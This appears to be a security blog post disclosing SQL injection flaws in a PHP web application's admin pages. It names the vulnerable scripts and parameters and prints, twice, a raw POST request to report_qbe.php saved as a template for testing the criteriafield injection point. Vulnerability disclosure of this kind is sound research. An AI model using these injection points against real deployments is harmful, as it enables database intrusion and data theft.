This time we'll start here:
SQLi bug described below is ("mostly focused" ;)) on admin-part-of-webapp. Few reasons of 'why' - you'll find on the screens below:
a) site_edit.php -> typeid, site
b) search_incidents_advanced.php -> search_title
... cleanvar() function in action:
... and so on. ;) So let's get back to our SQL injection for admin user logged-in:
c) report_qbe.php -> param criteriafield:
More precisely:
DIY version for your private legal CTFs only ;)
---<cut>---
c@kali:~$ cat test1.txt
POST /report_qbe.php HTTP/1.1
Host: 192.168.1.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.10
Connection: close
Referer: http://192.168.1.10/report_qbe.php
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; Accounts_divs=Accounts_documents_v%3Dtrue%23undefined%3D%23Accounts_accounts_v%3Dtrue%23Accounts_project_v%3Dtrue%23; AOR_Reports_divs=AOR_Reports_aor_scheduled_reports_aor_reports_v%3Dtrue%23undefined%3D%23; PHPSESSID=7a4rcc45nracu0s7vg2alnqeq1; ZMSESSID=nh054rbcptbu3svclu3dbqpvi1; SiTsessionID=fkum2is1ac6m4nit7o7erge8g7
Upgrade-Insecure-Requests: 1
sortby=servicelevelid&sortorder=none&criteriafield=rapnadzielni&criteriaop=eq&criteriaval=aaa&limit=1000&output=screen&table1=billing_periods&mode=report
c@kali:~$ ^C
POST /report_qbe.php HTTP/1.1
Host: 192.168.1.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.10
Connection: close
Referer: http://192.168.1.10/report_qbe.php
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; Accounts_divs=Accounts_documents_v%3Dtrue%23undefined%3D%23Accounts_accounts_v%3Dtrue%23Accounts_project_v%3Dtrue%23; AOR_Reports_divs=AOR_Reports_aor_scheduled_reports_aor_reports_v%3Dtrue%23undefined%3D%23; PHPSESSID=7a4rcc45nracu0s7vg2alnqeq1; ZMSESSID=nh054rbcptbu3svclu3dbqpvi1; SiTsessionID=fkum2is1ac6m4nit7o7erge8g7
Upgrade-Insecure-Requests: 1
sortby=servicelevelid&sortorder=none&criteriafield=rapnadzielni&criteriaop=eq&criteriaval=aaa&limit=1000&output=screen&table1=billing_periods&mode=report
c@kali:~$ ^C
---</cut>---
You'll find it here:
Maybe you'll find it useful. ;]
Special thanks goes to my Patreon: Daniel.
You are AWESOME! ;)
See you next time!
Cheers
Brak komentarzy:
Prześlij komentarz